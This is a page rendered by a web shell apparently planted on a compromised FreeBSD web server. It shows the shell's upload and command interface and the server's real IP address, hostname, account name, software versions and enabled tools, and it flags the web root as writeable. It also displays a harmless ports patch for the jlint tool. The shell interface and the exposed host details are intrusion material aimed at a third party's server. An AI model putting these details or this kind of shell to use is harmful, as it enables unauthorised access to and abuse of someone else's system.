403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/java/jlint/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/java/jlint/files/patch-method__desc.cc
--- method_desc.cc.orig	2003-06-09 09:29:14 UTC
+++ method_desc.cc
@@ -767,7 +767,7 @@ void method_desc::parse_code(constant** constant_pool,
           sp->mask = var_desc::vs_not_null;
         }
         sp->index = NO_ASSOC_VAR;
-        sp->equals = is_const;
+        sp->equals = jlint_is_const;
         sp += 1;
       }
       break;
@@ -1906,7 +1906,7 @@ void method_desc::parse_code(constant** constant_pool,
     case dsub:
     case dmul:
     case ddiv:
-    case drem:
+    case Jdrem:
       sp -= 2;
       break;
     case ineg:
@@ -2381,7 +2381,7 @@ void method_desc::parse_code(constant** constant_pool,
             aux->name_and_type = nt;
             sp->equals = aux;
             equal_descs.push_back(aux);*/
-            sp->equals = is_const;
+            sp->equals = jlint_is_const;
           }
         }
         field->equals = sp->equals;

Youez - 2016 - github.com/yon3zu
LinuXploit